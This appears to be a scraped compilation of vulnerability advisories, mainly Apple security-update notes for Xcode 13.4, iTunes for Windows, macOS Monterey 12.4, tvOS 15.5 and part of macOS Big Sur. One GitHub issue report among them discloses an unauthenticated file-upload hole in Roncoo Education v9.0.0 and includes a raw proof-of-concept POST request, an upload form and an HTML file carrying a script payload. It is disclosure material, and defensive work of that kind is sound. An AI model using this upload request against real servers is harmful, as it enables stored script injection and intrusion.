This issue was addressed with improved checks. This issue is fixed in Xcode 13.4. An app may be able to gain elevated privileges.

This document describes the security content of Xcode 13.4.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Xcode 13.4**

Released May 16, 2022

**Git**

Available for: macOS Monterey 12 or later

Impact: On multi-user machines Git users might find themselves unexpectedly in a Git worktree

Description: A logic issue was addressed with improved state management.

CVE-2022-24765: 俞晨东

**IDE**

Available for: macOS Monterey 12 or later

Impact: An app may be able to gain elevated privileges

Description: This issue was addressed with improved checks.

CVE-2022-26747: Mickey Jin (@patch1t)

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 16, 2022

CVE-2022-26747: About the security content of Xcode 13.4

A logic issue was addressed with improved state management. This issue is fixed in iTunes 12.12.4 for Windows. A local attacker may be able to elevate their privileges.

This document describes the security content of iTunes 12.12.4 for Windows.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iTunes 12.12.4 for Windows**

Released May 18, 2022

**AppleGraphicsControl**

Available for: Windows 10 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**ImageIO**

Available for: Windows 10 and later

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow issue was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**iTunes**

Available for: Windows 10 and later

Impact: A local attacker may be able to elevate their privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-26774: Sai Wynn Myat (@404death)

**Mobile Device Service**

Available for: Windows 10 and later

Impact: An application may be able to delete files for which it does not have permission

Description: A logic issue was addressed with improved state management.

CVE-2022-26773: Sai Wynn Myat (@404death)

**WebKit**

Available for: Windows 10 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

 

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 18, 2022

CVE-2022-26774: About the security content of iTunes 12.12.4 for Windows

An arbitrary file upload vulnerability in the component /course/api/upload/pic of Roncoo Education v9.0.0 allows attackers to execute arbitrary code via a crafted file.

\[Suggested description\]

File upload vulnerability in roncoo education. Because the identity is not authenticated in the uploadpic upload method of apiuploadcontroller, and the user is allowed to define the file suffix.

\[Vulnerability Type\]

File upload vulnerability

\[Vendor of Product\]

https://github.com/roncoo/roncoo-education

\[Affected Product Code Base\]

v9.0.0-RELEASE

\[Affected Component\]

    POST /course/api/upload/pic HTTP/1.1
    Host: localhost
    Connection: close
    Content-Length: 480
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxOJxWZtarWTvGvWD
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    
    ------WebKitFormBoundaryxOJxWZtarWTvGvWD
    Content-Disposition: form-data; name="picFile"; filename="test.html"
    Content-Type: image/jpeg
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Document</title>
    </head>
    <body>
      <script>alert('xss');</script>
    </body>
    </html>
    ------WebKitFormBoundaryxOJxWZtarWTvGvWD--
    

\[Vulnerability proof\]

Use the following HTML file to initiate the upload request

    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Document</title>
    </head>
    <body>
      <form action="https://localhost/course/api/upload/pic" method="post", enctype="multipart/form-data">
        <input type="file" name="picFile" />
        <input type="submit" value="上传" />
      </form>
    </body>
    </html>
    

Upload any file, here my file source code is

    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Document</title>
    </head>
    <body>
      <script>alert('xss');</script>
    </body>
    </html>
    

The server returns the following data

    {"code":200,"msg":"","data":"http://localhost/course/e89eadfcd465481d8ca7075e8e00c412.html"}
    

\[Defective code\]

CVE-2022-29632: There is a File upload vulnerability exists in roncoo-education · Issue #16 · roncoo/roncoo-education

An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. An application may be able to execute arbitrary code with kernel privileges.

Released May 16, 2022

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26772: an anonymous researcher

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2022-26741: ABC Research s.r.o

CVE-2022-26742: ABC Research s.r.o

CVE-2022-26749: ABC Research s.r.o

CVE-2022-26750: ABC Research s.r.o

CVE-2022-26752: ABC Research s.r.o

CVE-2022-26753: ABC Research s.r.o

CVE-2022-26754: ABC Research s.r.o

**apache**

Available for: macOS Monterey

Impact: Multiple issues in apache

Description: Multiple issues were addressed by updating apache to version 2.4.53.

CVE-2021-44224

CVE-2021-44790

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

**AppleGraphicsControl**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-26698: Qi Sun of Trend Micro

**AVEVideoEncoder**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26736: an anonymous researcher

CVE-2022-26737: an anonymous researcher

CVE-2022-26738: an anonymous researcher

CVE-2022-26739: an anonymous researcher

CVE-2022-26740: an anonymous researcher

**Contacts**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-26694: Wojciech Reguła (@\_r3ggi) of SecuRing

**CVMS**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A memory initialization issue was addressed.

CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori

CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

**DriverKit**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow issue was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Monterey

Impact: Photo location information may persist after it is removed with Preview Inspector

Description: A logic issue was addressed with improved state management.

CVE-2022-26725: Andrew Williams and Avi Drissman of Google

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26769: Antonio Zekic (@antoniozekic)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro Zero Day Initiative

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26756: Jack Dates of RET2 Systems, Inc

**IOKit**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-26701: chenyuwang (@mzzzz\_\_) of Tencent Security Xuanwu Lab

**IOMobileFrameBuffer**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26768: an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: An attacker that has already achieved code execution in macOS Recovery may be able to escalate to kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26743: Jordy Zomer (@pwningsystems)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**Kernel**

Available for: macOS Monterey

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: macOS Monterey

Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: macOS Monterey

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**LaunchServices**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass Privacy preferences

Description: The issue was addressed with additional permissions checks.

CVE-2022-26767: Wojciech Reguła (@\_r3ggi) of SecuRing

**libresolv**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@\_mxms) of the Google Security Team

CVE-2022-26708: Max Shavrick (@\_mxms) of the Google Security Team

**libresolv**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2022-26775: Max Shavrick (@\_mxms) of the Google Security Team

**LibreSSL**

Available for: macOS Monterey

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2022-0778

**libxml2**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**OpenSSL**

Available for: macOS Monterey

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: This issue was addressed with improved checks.

CVE-2022-0778

**PackageKit**

Available for: macOS Monterey

Impact: A malicious application may be able to modify protected parts of the file system

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26712: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Monterey

Impact: A malicious application may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2022-26727: Mickey Jin (@patch1t)

**Preview**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-26693: Wojciech Reguła (@\_r3ggi) of SecuRing

**Printing**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26746: @gorelics

**Safari Private Browsing**

Available for: macOS Monterey

Impact: A malicious website may be able to track users in Safari private browsing mode

Description: A logic issue was addressed with improved state management.

CVE-2022-26731: an anonymous researcher

**Security**

Available for: macOS Monterey

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**SMB**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

**SMB**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

**SMB**

Available for: macOS Monterey

Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26723: Felix Poulin-Belanger

**SoftwareUpdate**

Available for: macOS Monterey

Impact: A malicious application may be able to access restricted files

Description: This issue was addressed with improved entitlements.

CVE-2022-26728: Mickey Jin (@patch1t)

**Spotlight**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: A validation issue existed in the handling of symlinks and was addressed with improved validation of symlinks.

CVE-2022-26704: an anonymous researcher

**TCC**

Available for: macOS Monterey

Impact: An app may be able to capture a user's screen

Description: This issue was addressed with improved checks.

CVE-2022-26726: an anonymous researcher

**Tcl**

Available for: macOS Monterey

Impact: A malicious application may be able to break out of its sandbox

Description: This issue was addressed with improved environment sanitization.

CVE-2022-26755: Arsenii Kostromin (0x3c3e)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab

WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

**WebRTC**

Available for: macOS Monterey

Impact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call

Description: A logic issue in the handling of concurrent media was addressed with improved state handling.

WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

**Wi-Fi**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26761: Wang Yu of Cyberserval

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26762: Wang Yu of Cyberserval

**zip**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to a denial of service

Description: A denial of service issue was addressed with improved state handling.

CVE-2022-0530

**zlib**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-25032: Tavis Ormandy

**zsh**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause arbitrary code execution

Description: This issue was addressed by updating to zsh version 5.8.1.

CVE-2021-45444

CVE-2022-26738: About the security content of macOS Monterey 12.4

An authentication issue was addressed with improved state management. This issue is fixed in tvOS 15.5. A local user may be able to enable iCloud Photos without authentication.

Released May 16, 2022

**AppleAVD**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26702: an anonymous researcher

**AppleAVD**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22675: an anonymous researcher

**AuthKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A local user may be able to enable iCloud Photos without authentication

Description: An authentication issue was addressed with improved state management.

CVE-2022-26724:  Jorge A. Caballero (@DataDrivenMD)

**AVEVideoEncoder**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26736: an anonymous researcher

CVE-2022-26737: an anonymous researcher

CVE-2022-26738: an anonymous researcher

CVE-2022-26739: an anonymous researcher

CVE-2022-26740: an anonymous researcher

**DriverKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**IOKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-26701: chenyuwang (@mzzzz\_\_) of Tencent Security Xuanwu Lab

**IOMobileFrameBuffer**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26768: an anonymous researcher

**IOSurfaceAccelerator**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26771: an anonymous researcher

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**libxml2**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**Security**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab

WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

**Wi-Fi**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

CVE-2022-26724: About the security content of tvOS 15.5

An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.3.1, iOS 15.4.1 and iPadOS 15.4.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..

Released May 16, 2022

**apache**

Available for: macOS Big Sur

Impact: Multiple issues in apache

Description: Multiple issues were addressed by updating apache to version 2.4.53.

CVE-2021-44224

CVE-2021-44790

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

**AppKit**

Available for: macOS Big Sur

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22665: Lockheed Martin Red Team

**AppleAVD**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22675: an anonymous researcher

**AppleGraphicsControl**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-26698: Qi Sun of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

**CoreTypes**

Available for: macOS Big Sur

Impact: A malicious application may bypass Gatekeeper checks

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2022-22663: Arsenii Kostromin (0x3c3e)

**CVMS**

Available for: macOS Big Sur

Impact: A malicious application may be able to gain root privileges

Description: A memory initialization issue was addressed.

CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori

CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

**DriverKit**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**Graphics Drivers**

Available for: macOS Big Sur

Impact: A local user may be able to read kernel memory

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2022-22674: an anonymous researcher

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26756: Jack Dates of RET2 Systems, Inc

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26769: Antonio Zekic (@antoniozekic)

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro Zero Day Initiative

**IOMobileFrameBuffer**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26768: an anonymous researcher

**Kernel**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**LaunchServices**

Available for: macOS Big Sur

Impact: A malicious application may be able to bypass Privacy preferences

Description: The issue was addressed with additional permissions checks.

CVE-2022-26767: Wojciech Reguła (@\_r3ggi) of SecuRing

**LaunchServices**

Available for: macOS Big Sur

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**libresolv**

Available for: macOS Big Sur

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@\_mxms) of the Google Security Team

**LibreSSL**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2022-0778

**libxml2**

Available for: macOS Big Sur

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**OpenSSL**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: This issue was addressed with improved checks.

CVE-2022-0778

**PackageKit**

Available for: macOS Big Sur

Impact: A malicious application may be able to modify protected parts of the file system

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26712: Mickey Jin (@patch1t)

**Printing**

Available for: macOS Big Sur

Impact: A malicious application may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26746: @gorelics

**Security**

Available for: macOS Big Sur

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**SMB**

Available for: macOS Big Sur

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

**SMB**

Available for: macOS Big Sur

Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26723: Felix Poulin-Belanger

**SMB**

Available for: macOS Big Sur

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

**SoftwareUpdate**

